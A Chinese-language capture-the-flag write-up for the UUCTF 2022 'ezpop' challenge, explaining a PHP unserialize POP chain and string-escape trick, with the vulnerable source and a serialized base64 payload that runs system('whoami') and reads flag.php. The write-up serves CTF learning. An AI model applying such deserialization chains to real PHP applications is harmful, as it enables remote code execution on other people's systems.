news 2026/6/10 6:02:17

[UUCTF 2022 新生赛]ezpop

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[UUCTF 2022 新生赛]ezpop

1.打开先看代码

<?php //flag in flag.php error_reporting(0); class UUCTF{ public $name; public $key; public $basedata; public $ob; function __construct($str){ $this->name=$str; } function __wakeup(){ if($this->key==="UUCTF"){ $this->ob=unserialize(base64_decode($this->basedata)); } else{ die("oh!you should learn PHP unserialize String escape!"); } } } class output{ public $a; function __toString(){ $this->a->rce(); } } class nothing{ public $a; public $b; public $t; function __wakeup(){ $this->a=""; } function __destruct(){ $this->b=$this->t; die($this->a); } } class youwant{ public $cmd; function rce(){ eval($this->cmd); } } $pdata=$_POST["data"]; if(isset($pdata)) { $data=serialize(new UUCTF($pdata)); $data_replace=str_replace("hacker","loveuu!",$data); unserialize($data_replace); }else{ highlight_file(__FILE__); } ?>

首先提示了flag在flag.php中

一个四个类、UUCTF、output、nothing、youwant

UUCTF类:

里面定义了四个公共属性,name、key、basedata、ob

construct方法,里面接收一个参数$str,触发了会让$str赋值给本类的name属性

wakeup方法,触发了会有一个if语句,判断本类的key属性的值是否强等于UUCTF,如果等于就将本类的basedata属性进行一个base64解码,然后再进行反序列化,最后赋值给本类的ob属性,如果key不为UUCTF就die退出

output类:

一个公共属性a

toString方法,触发了会让$this->a对象调用它的rce方法

nothing类:

三个公共属性,a、b、t

wakeup方法,触发了会让本类的a属性赋值一个空

destruct方法,触发了会让本类的t属性赋值给本类的b属性,然后die退出并输出本类的a属性的值

youwant类:

一个公共属性cmd

rce方法,触发了会eval执行本类的cmd属性的内容

然后下面POST传参一个data,然后赋值给$pdata

if检查有没有$pdata,有的话,先让它当成实例UUCTF类的参数,再进行反序列化,随后赋值给$data,随后进行一个检查,检查$data中是否有hacker,如果有的话就给替换成loveuu!,随后将值赋值给$data_replace,最后将$data_replace进行一个反序列化的操作

2.思路构造

首先看到str_replace替换,就想到字符串逃逸,然后他的替换由6位变成了7位,那么就是字符串逃逸增多,先看一下题目再想着逃逸的点在哪里

这题的链子很容易,就是

nothing :: destruct ---> output :: toString ---> youwant :: rce

但是我们看最后的执行参数,是要再经过UUCTF类实例化一遍完并且再经过一遍序列化的

这时候看UUCTF类,它最先触发的是wakeup方法,首先要满足他的if语句,让key为UUCTF,那么指定是这里逃逸无疑了,整段代码只有这一个需要满足的,接下来看里面的语句,首先是将本类的basedata属性进行一个base64解码,然后再进行反序列化的操作,既然这里的参数是basedata属性,那么链子的值是赋值给basedata的,然后这里name属性在key属性的前面,那么就是通过name的值,来逃逸key的UUCTF和我们的序列化的值了

那么接下来链子就变成了

UUCTF :: wakeup ---> nothing :: wakeup (因为反序列化会让他先触发,他是捣乱的,使用引用的方式绕过) nothing :: destruct ---> output :: toString ---> youwant :: rce

上面这是要正常的链子,然后接下来将base64编码后的序列化后的链子值带入到UUCTF中,为了满足参数

然后先正常序列化一下UUCTF类的属性看看是怎么情况

O:5:"UUCTF":4:{s:4:"name";s:1:"1";s:3:"key";s:5:"UUCTF";s:8:"basedata";N;s:2:"ob";N;}
其中紫色的字段是传参上去代码实例化UUCTF并序列化后自带的,红色部分是要逃逸的字段,来满足key为UUCTF,黄色的字段,是为了满足后面红色要逃逸字段的替换字符hacker(这里的name赋值为1是为了方便观看要逃逸的字段)

接下来将刚才序列化的链子传递上去,看看要逃逸的字符长度

O:5:"UUCTF":4:{s:4:"name";s:1:"1";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:168:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjE3OiJzeXN0ZW0oJ3dob2FtaScpOyI7fX19";s:2:"ob";N;}

红色字体为要逃逸的部分,计算一下长度为228位,那么伪造228个hacker在前面

传参上去看看情况,成功执行whoami,接下来打开题目看一下

3.开始构造

然后将base64编码后的序列化的值,带入到UUCTF类中

要逃逸的长度位224,然后再生成224个hacker

然后带入到题目中

最后查看一下就行了

cat flag.php命令的长度是236位,需要伪造236个hacker,cat查看的flag是在源代码中

4.知识点

这题考验的是一个反序列化字符逃逸的增多

这题其实挺绕人的,一开始没关注那个wakeup以为绕过去了,结果还是栽在wakeup上了,看到了使用引用进行一个绕过

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/10 4:36:00

【鸿蒙开发案例篇】拒绝裸奔!鸿蒙6实现PDF动态加密

兄弟们抄起键盘&#xff01;今天V哥要带大家用鸿蒙6.0的pdfService玩转PDF动态加密&#xff0c;让敏感文档在战场上穿隐身衣。以下基于HarmonyOS 6.0&#xff08;API 21&#xff09;的ArkTS实战&#xff0c;全程高能代码爆破&#xff0c;专治数据泄露不服&#xff01;&#x1f…

作者头像 李华
网站建设 2026/6/9 7:20:18

ubuntu 控制台 清屏命令

在Ubuntu控制台&#xff08;终端&#xff09;中&#xff0c;清屏的常用方法有以下几种&#xff0c;按推荐顺序排列&#xff1a;1. clear 命令直接输入&#xff1a;在终端中输入 clear 后按回车&#xff0c;屏幕会滚动清空当前显示内容&#xff0c;保留历史命令记录&#xff08;…

作者头像 李华
网站建设 2026/6/8 20:53:51

【开题答辩全过程】以 基于Java的保定理工科研信息管理系统的设计与实现为例,包含答辩的问题和答案

个人简介一名14年经验的资深毕设内行人&#xff0c;语言擅长Java、php、微信小程序、Python、Golang、安卓Android等开发项目包括大数据、深度学习、网站、小程序、安卓、算法。平常会做一些项目定制化开发、代码讲解、答辩教学、文档编写、也懂一些降重方面的技巧。感谢大家的…

作者头像 李华
网站建设 2026/6/9 13:23:25

24、Python在多操作系统及云计算环境中的应用与实践

Python在多操作系统及云计算环境中的应用与实践 1. OS X系统管理 1.1 获取和排序进程名 在OS X系统中,可以使用以下代码获取并排序应用程序的进程名: processnames = sysevents.application_processes.name.get() processnames.sort(lambda x, y: cmp(x.lower(), y.lowe…

作者头像 李华
网站建设 2026/6/9 21:15:57

30、Python 并发编程:线程、进程与调度

Python 并发编程:线程、进程与调度 1. 线程编程基础 在 Python 中,线程是实现并发编程的一种方式。以下代码展示了如何创建一个线程池来执行 arping 操作: worker.start() #spawn pool of arping threads for i in range(num_arp_threads):worker = Thread(target=arp…

作者头像 李华